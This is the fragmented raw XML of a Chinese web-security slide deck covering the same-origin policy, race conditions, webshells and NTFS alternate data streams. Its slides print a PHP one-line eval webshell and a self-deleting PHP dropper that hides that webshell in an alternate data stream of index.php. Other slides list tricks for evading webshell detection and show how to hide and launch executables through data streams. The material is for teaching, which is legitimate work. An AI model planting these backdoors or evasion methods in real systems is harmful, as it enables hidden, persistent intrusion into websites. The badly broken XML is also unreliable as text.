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01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0" autoAdjust="0"/>
    <p:restoredTop sz="95846" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="71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7-09-14T17:22:21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1201 546,'18'-18,"52"71,18 17,36 36,17 18,106 35,17 17,36 36,0-18,53 35,-18-35,71 18,52 70,1-35,-36 70,71-35,-36 1,-70-36,-35-36,-35-34,-1 34,-70-34,0-36,-35 0,35-35,-36 70,-34 0,-1-70,-70-35,35-1,-88-52,0 17,-18 1,18-19,-35 1,34 17,1 0,36 1,-37 17,37-18,-36-18,-1 19,-34-36,0 0,-1 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17-09-14T17:22:21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6591 495,'-17'-18,"-36"53,18 18,-1 53,-34 17,-1 19,-17 34,-35 0,-19 1,-34 34,0 19,35-36,-53 35,17 36,-34 34,17 1,-53 18,17-1,-34 1,17-18,35-53,1 70,70-105,-36-1,71 36,-17-70,-18-1,0 18,17 0,54-53,-18 0,-1 53,1-88,0 0,-18 35,18 0,53-70,-53 17,17 18,36-36,-18 1,0 0,35-36,1 18,-1-36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E82E3-DB0B-4307-9A30-C716EF5DA928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459F1-CD85-4C37-BB55-0BFE7A27C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75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工具使用说明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>create 创建文件流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>enum 列举文件流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>delete 删除文件流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>write 写入内容到文件流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>append 增加文件到文件流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>launch 执行文件流的内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>dump 读取文件流的内容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459F1-CD85-4C37-BB55-0BFE7A27C2E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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2E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459F1-CD85-4C37-BB55-0BFE7A27C2E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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2E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&lt;?php </a:t>
            </a:r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exec('echo "&lt;?php @eval($_POST[key]);?&gt;"&gt;&gt;index.php:key.php'); </a:t>
            </a:r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$key = &lt;&lt;&lt;key </a:t>
            </a:r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echo "&lt;?php include 'index.php:key.php';?&gt;"&gt;&gt;a.php </a:t>
            </a:r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key; </a:t>
            </a:r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exec($key); </a:t>
            </a:r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$url = $_SERVER['PHP_SELF']; </a:t>
            </a:r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$filename= substr($url,strrpos($url,'/')+1); </a:t>
            </a:r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@unlink($filename); </a:t>
            </a:r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?&gt;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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2EF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459F1-CD85-4C37-BB55-0BFE7A27C2EF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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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26F0EF-18F3-44DC-BB66-1412ED23499C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5044E9-ECAF-4FBC-AAC0-AB4E39B28D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58" y="200116"/>
            <a:ext cx="2053030" cy="575478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图形 23" descr="眼睛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941" y="5724731"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10162157" y="5939777"/>
            <a:ext cx="1695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洞察安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Grafik 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15">
            <a:lum bright="4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90289">
            <a:off x="669407" y="4602135"/>
            <a:ext cx="1698967" cy="1696915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection endPos="0" dir="5400000" sy="-100000" algn="bl" rotWithShape="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40021" y="2396710"/>
            <a:ext cx="4711959" cy="705485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pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="40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WEB安全-杂类知识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78964" y="3132364"/>
            <a:ext cx="2034073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@key 2017.0</a:t>
            </a:r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9.01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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1556385"/>
            <a:ext cx="11400790" cy="311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然后写入内容到文件流vkey：</a:t>
            </a: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FileStreams.exe write mst.txt vkey content</a:t>
            </a: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再来查看文件流vkey的内容：</a:t>
            </a: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FileStreams.exe dump mst.txt vkey 14</a:t>
            </a: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这里的14从何而来，相信聪明的你们能明白。（文件流vkey大小 14） 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615" y="2319655"/>
            <a:ext cx="7428865" cy="1257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475" y="4964430"/>
            <a:ext cx="6828790" cy="647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4097020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS特性研究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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373380" y="1564640"/>
            <a:ext cx="11400790" cy="311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那么最开始也说了，文件流是可以用来启动程序的，我们来试试：</a:t>
            </a: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1. 加入文件到文件流vkey：</a:t>
            </a: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FileStreams.exe append mst.txt vkey C:/Users/gh0stkey/Desktop/test/FileStreams.exe</a:t>
            </a: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2. 查看文件流vkey的内容，这里就看前100个字节的内容：</a:t>
            </a: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FileStreams.exe dump mst.txt vkey 100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825" y="2713355"/>
            <a:ext cx="6902450" cy="9759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530" y="4735830"/>
            <a:ext cx="6191885" cy="16554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4097020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS特性研究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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373380" y="1564640"/>
            <a:ext cx="11400790" cy="916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3. 执行文件流vkey：</a:t>
            </a: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顺利的执行了C:/Users/gh0stkey/Desktop/test/FileStreams.exe 这个文件。</a:t>
            </a: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575" y="2860040"/>
            <a:ext cx="7038340" cy="2362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4097020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS特性研究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97020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS特性研究</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373380" y="1564640"/>
            <a:ext cx="11400790" cy="3933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特性2研究：</a:t>
            </a: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自动创建空文件：</a:t>
            </a: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自动创建宿主，然后寄生。</a:t>
            </a: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在没有原文件的情况下创建文件流，会自动创建一个空文件。</a:t>
            </a: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190" y="2222500"/>
            <a:ext cx="6390640" cy="20859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97020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS实际应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373380" y="1564640"/>
            <a:ext cx="11400790" cy="916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Webshell后门：</a:t>
            </a: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955" y="1881505"/>
            <a:ext cx="7324090" cy="30949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16033" y="491490"/>
            <a:ext cx="4559935" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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分析第三方危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091940" y="1451610"/>
            <a:ext cx="394017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外部JS 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/</a:t>
            </a:r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外部CSS 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/</a:t>
            </a:r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域名商 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/</a:t>
            </a:r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服务器商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065655" y="2235200"/>
            <a:ext cx="8060690" cy="9163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浏览器的同源策略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同源策略：不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在未经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>授权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的情况下不能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>读写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对方的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>资源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下表展示了所列站点与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.hi-ourlife.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是否同域的情况。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1009650" y="3314700"/>
          <a:ext cx="1045400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4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站点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同域？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原因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https://www.hi-ourlife.com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协议不同(http / https)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http://lab.hi-ourlife.com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800">
                          <a:sym typeface="+mn-ea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域名不同(lab &amp; www 不同子域)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http://hi-ourlife.com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800">
                          <a:sym typeface="+mn-ea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域名不同(www是子域 这是顶级)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http://www.hi-ourlife.com:81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800">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>N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端口不同(81 / 80[默认端口])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http://www.hi-ourlife.com/cn/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/>
                        <a:t>满足如上条件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22787" y="490011"/>
            <a:ext cx="3946427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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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条件竞争漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808383" y="1451610"/>
            <a:ext cx="10575234" cy="28623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条件竞争漏洞是一种服务器端的漏洞，由于服务器端在处理不同用户的请求时是并发进行的，因此，如果并发处理不当或相关操作逻辑顺序设计的不合理时，将会导致此类问题的发生。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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并发的实质是一个物理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CPU(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也可以多个物理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CPU) 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在若干道程序（或线程）之间多路复用，并发性是对有限物理资源强制行使多用户共享以提高效率。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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微观角度：所有的并发处理都有排队等候，唤醒，执行等这样的步骤，在微观上他们都是序列被处理的，如果是同一时刻到达的请求（或线程）也会根据优先级的不同，而先后进入队列排队等候执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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宏观角度：多个几乎同时到达的请求（或线程）在宏观上看就像是同时在被处理。 </a:t>
            </a:r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1030" name="Picture 6" descr="https://bbs.ichunqiu.com/data/attachment/forum/201706/28/164736k9eo7zr1p29l9p7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409" y="4504837"/>
            <a:ext cx="2819400" cy="1971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783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65347" y="491490"/>
            <a:ext cx="3861306" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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条件竞争漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117801" y="1463485"/>
            <a:ext cx="595639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今天林晨找我给他打钱他要去做一项有意义的运动来减肥</a:t>
            </a:r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9B7B05F-07FF-E2B9-94D0-C9A128D35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298" y="2809586"/>
            <a:ext cx="45974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95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65347" y="491490"/>
            <a:ext cx="3861306" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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条件竞争漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320706" y="1451610"/>
            <a:ext cx="755058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可是摸摸口袋发现只有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块钱那怎么办呢？？健身卡最起码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800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块钱起啊！</a:t>
            </a:r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393" y="2133352"/>
            <a:ext cx="4273213" cy="3656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0879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65347" y="491490"/>
            <a:ext cx="3861306" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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条件竞争漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648139" y="1451610"/>
            <a:ext cx="689572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除了写脚本有什么更简单的利用方法么？当然有，使用神器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Fiddler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！</a:t>
            </a:r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872" y="1956744"/>
            <a:ext cx="7923110" cy="3826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9696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03395" y="499745"/>
            <a:ext cx="3324860" cy="82804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x-none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Webshell？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930" y="2468245"/>
            <a:ext cx="5955030" cy="1843405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="箭头: 右 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7658108" y="3187756"/>
            <a:ext cx="1101012" cy="33590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996045" y="3168650"/>
            <a:ext cx="111760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网页后门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78058" y="499745"/>
            <a:ext cx="2635885" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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其原理？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3966845" y="1814830"/>
            <a:ext cx="4693920" cy="4743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&lt;?php @eval($_POST['key']);?&gt;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8206740" y="1926590"/>
            <a:ext cx="321310" cy="2711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44315" y="1932940"/>
            <a:ext cx="868680" cy="2711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/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="4785995" y="1904365"/>
            <a:ext cx="813435" cy="1428115"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FD01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" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7263765" y="1929765"/>
            <a:ext cx="828040" cy="1379220"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FD012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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5923280" y="2860675"/>
            <a:ext cx="111760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PHP头尾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04460" y="1913255"/>
            <a:ext cx="573405" cy="2711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stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4016375" y="1918970"/>
            <a:ext cx="1202055" cy="1748155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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616835" y="3185160"/>
            <a:ext cx="111760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语言结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Box 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3518535"/>
            <a:ext cx="259080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en-US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将字符串当做PHP代码解析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88990" y="1918335"/>
            <a:ext cx="2113280" cy="29527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本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8773795" y="3238500"/>
            <a:ext cx="65913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传参 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Elbow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7244080" y="1938020"/>
            <a:ext cx="1196975" cy="1763395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7783830" y="3540125"/>
            <a:ext cx="30022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en-US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获取POST请求正文参数key的值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615" y="4157980"/>
            <a:ext cx="7306310" cy="16814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68420" y="499745"/>
            <a:ext cx="4455160" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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你在刁难我胖虎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720" y="1863725"/>
            <a:ext cx="981075" cy="9334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070" y="2013585"/>
            <a:ext cx="1714500" cy="6667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940" y="3093720"/>
            <a:ext cx="4904105" cy="2403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9740" y="3542030"/>
            <a:ext cx="5070475" cy="15697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/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7626350" y="3352800"/>
              <a:ext cx="3162300" cy="199390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7"/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7626350" y="3352800"/>
                <a:ext cx="3162300" cy="1993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/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8369300" y="3028950"/>
              <a:ext cx="1898650" cy="269875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9"/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8369300" y="3028950"/>
                <a:ext cx="1898650" cy="2698750"/>
              </a:xfrm>
              <a:prstGeom prst="rect"/>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24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79615" y="1853565"/>
            <a:ext cx="3059430" cy="10153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70998" y="499745"/>
            <a:ext cx="3850005" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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绕过查杀规则</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235200" y="2997200"/>
            <a:ext cx="2379345" cy="916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1.静态文本查杀</a:t>
            </a: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2.动态执行查杀</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097905" y="2379345"/>
            <a:ext cx="4975860" cy="20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1.文本查杀绕过：</a:t>
            </a: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大小转换、文本颠倒、文本分割、干扰函数、加密、语言特征...</a:t>
            </a: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2.动态执行查杀绕过：</a:t>
            </a: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加密传输、改变传输特征...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91660" y="491490"/>
            <a:ext cx="3408680" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS文件流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1556385"/>
            <a:ext cx="11400790" cy="2562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TFS文件系统实现了多文件流特性，NTFS环境一个文件默认使用的是未命名的文件流，同时可创建其他命名的文件流，windows资源管理器默认不显示出文件的命名文件流，这些命名的文件流在功能上和默认使用的未命名文件流一致，甚至可以用来启动程序。</a:t>
            </a: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x-none" altLang="en-US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NTFS文件流生成步骤：</a:t>
            </a:r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1. 我们在任意一个NTFS分区下打开CMD命令提示符，输入echo mstlab&gt;&gt;mst.txt:test.txt，则在当前目录下会生成一个名为mst.txt的文件，但文件的大小为0字节，打开后也无任何内容。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510" y="4361180"/>
            <a:ext cx="6854825" cy="22402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91660" y="491490"/>
            <a:ext cx="3408680" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS文件流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1556385"/>
            <a:ext cx="11400790" cy="3659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只有输入命令：notepad mst.txt:test.txt 才能看见写入的mstlab</a:t>
            </a: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2. 在上边的命令中，mst.txt可以不存在，也可以是某个已存的文件，文件格式无所谓，无论是.txt还是.jpg|.exe|.asp都行b.txt也可以任意指定文件名以及后缀名。（可以将任意文本信息隐藏于任意文件中，只要不泄露冒号后的虚拟文件名(即test.txt)，别人是根本不会查看到隐藏信息的）。 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345" y="2181225"/>
            <a:ext cx="7171690" cy="203835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91660" y="491490"/>
            <a:ext cx="3408680" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS文件流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1556385"/>
            <a:ext cx="11400790" cy="4482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3. 包含隐藏信息的文件仍然可以继续隐藏其它的内容，对比上例，我们仍然可以使用命令echo mstlab1&gt;&gt;mst.txt:test1.txt　给mst.txt建立新的隐藏信息的流文件，使用命令notepad mst.txt:test1.txt　打开后会发现mstlab1这段信息，而mstlab仍然存在于mst.txt:test.txt中丝毫不受影响。</a:t>
            </a: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所以这里的宿主mst.txt成功的被test.txt和test1.txt所寄生，而在这里的微妙关系显而易见，宿主消失寄生消失。 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560" y="2527300"/>
            <a:ext cx="8573135" cy="31178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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1556385"/>
            <a:ext cx="11400790" cy="338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特性1研究：</a:t>
            </a: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实验工具：https://github.com/wangyongxina/filestreams/blob/master/Release/Release.7z</a:t>
            </a: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我们让之前步骤归零，重新来看看mst.txt：</a:t>
            </a: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而这里的default文件流就验证了最开头的一句话，默认使用的是为命名的文件流。</a:t>
            </a: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实验开始，首先我们使用FileStreams.exe创建一个文件流vkey：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="x-none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x-none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FileStreams.exe create mst.txt vkey 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820" y="2766060"/>
            <a:ext cx="6485890" cy="7048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3080" y="5010785"/>
            <a:ext cx="6274435" cy="1358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4097020" y="491490"/>
            <a:ext cx="3997960" cy="82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wrap="square" rtlCol="0" anchor="ctr" anchorCtr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x-none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NTFS特性研究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946</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>186</Paragraphs>
  <Slides>19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思源黑体 CN Medium</vt:lpstr>
      <vt:lpstr>思源黑体 CN Regular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vulkey</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-12T12:53:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-24T08:19:35Z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